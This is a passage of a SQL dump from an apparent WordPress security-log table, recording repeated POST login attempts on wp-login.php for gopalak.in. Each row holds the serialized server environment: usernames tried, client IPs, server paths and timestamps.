Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41260\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.38.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747049312.311471;s:12:\"REQUEST_TIME\";i:1747049312;}}','63.250.38.36',0,'2025-05-12 16:58:34','1970-01-01 00:00:00'),(95671,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056190.0570951;s:12:\"REQUEST_TIME\";i:1747056190;}}','13.127.208.15',1,'2025-05-12 18:53:11','2025-05-13 20:21:05'),(95672,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056190.0439651;s:12:\"REQUEST_TIME\";i:1747056190;}}','13.127.208.15',1,'2025-05-12 18:53:11','2025-05-13 20:21:05'),(95673,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056190.0548339;s:12:\"REQUEST_TIME\";i:1747056190;}}','13.127.208.15',1,'2025-05-12 18:53:11','2025-05-13 20:21:04'),(95674,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056190.0540509;s:12:\"REQUEST_TIME\";i:1747056190;}}','13.127.208.15',1,'2025-05-12 18:53:11','2025-05-13 20:21:04'),(95675,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056190.0534799;s:12:\"REQUEST_TIME\";i:1747056190;}}','13.127.208.15',1,'2025-05-12 18:53:12','2025-05-13 20:21:04'),(95676,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056525.9307871;s:12:\"REQUEST_TIME\";i:1747056525;}}','13.127.208.15',1,'2025-05-12 18:58:47','2025-05-13 20:21:04'),(95677,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056525.9274261;s:12:\"REQUEST_TIME\";i:1747056525;}}','13.127.208.15',1,'2025-05-12 18:58:47','2025-05-13 20:21:04'),(95678,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056525.9399049;s:12:\"REQUEST_TIME\";i:1747056525;}}','13.127.208.15',1,'2025-05-12 18:58:47','2025-05-13 20:21:05'),(95679,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056525.926439;s:12:\"REQUEST_TIME\";i:1747056525;}}','13.127.208.15',1,'2025-05-12 18:58:47','2025-05-13 20:21:05'),(95680,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056525.932224;s:12:\"REQUEST_TIME\";i:1747056525;}}','13.127.208.15',1,'2025-05-12 18:58:47','2025-05-13 20:21:04'),(95681,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 